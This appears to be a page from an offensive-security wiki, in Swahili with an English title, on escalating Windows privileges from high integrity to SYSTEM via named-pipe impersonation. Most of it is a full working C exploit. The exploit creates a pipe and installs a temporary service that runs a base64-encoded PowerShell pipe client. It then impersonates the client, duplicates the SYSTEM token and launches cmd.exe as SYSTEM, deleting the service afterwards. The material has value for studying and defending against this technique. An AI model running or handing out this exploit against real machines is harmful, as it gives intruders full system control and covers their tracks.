From High Integrity to SYSTEM with Name Pipes
Mchakato wa nambari:
Unda Mrija mpya
Unda na anzisha huduma ambayo itaunganisha kwenye mrija uliozalishwa na kuandika kitu. Nambari ya huduma itatekeleza nambari hii iliyosimbwa ya PS:
$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();Huduma hupokea data kutoka kwa mteja kwenye mrija, huita ImpersonateNamedPipeClient na kusubiri huduma imalize
Hatimaye, hutumia kitambulisho kilichopatikana kutoka kwa huduma kuunda cmd.exe mpya
Ikiwa huna mamlaka ya kutosha, shambulio linaweza kusimama na kamwe halitarudi.
```c #include #include
#pragma comment (lib, "advapi32") #pragma comment (lib, "kernel32")
#define PIPESRV "PiperSrv" #define MESSAGE_SIZE 512
int ServiceGo(void) {
SC_HANDLE scManager; SC_HANDLE scService;
scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
if (scManager == NULL) { return FALSE; }
// create Piper service scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, "C:\Windows\\System32\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==", NULL, NULL, NULL, NULL, NULL);
if (scService == NULL) { //printf("[!] CreateServiceA() failed: [%d]\n", GetLastError()); return FALSE; }
// launch it StartService(scService, 0, NULL);
// wait a bit and then cleanup Sleep(10000); DeleteService(scService);
CloseServiceHandle(scService); CloseServiceHandle(scManager); }
int main() {
LPCSTR sPipeName = "\\.\pipe\piper"; HANDLE hSrvPipe; HANDLE th; BOOL bPipeConn; char pPipeBuf[MESSAGE_SIZE]; DWORD dBRead = 0;
HANDLE hImpToken; HANDLE hNewToken; STARTUPINFOA si; PROCESS_INFORMATION pi;
// open pipe hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
// create and run service th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);
// wait for the connection from the service bPipeConn = ConnectNamedPipe(hSrvPipe, NULL); if (bPipeConn) { ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);
// impersonate the service (SYSTEM) if (ImpersonateNamedPipeClient(hSrvPipe) == 0) { return -1; }
// wait for the service to cleanup WaitForSingleObject(th, INFINITE);
// get a handle to impersonated token if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) { return -2; }
// create new primary token for new process if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hNewToken)) { return -4; }
//Sleep(20000); // spawn cmd.exe as full SYSTEM user ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); ZeroMemory(&pi, sizeof(pi)); if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL, NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) { return -5; }
// revert back to original security context RevertToSelf();
}
return 0; }
Last updated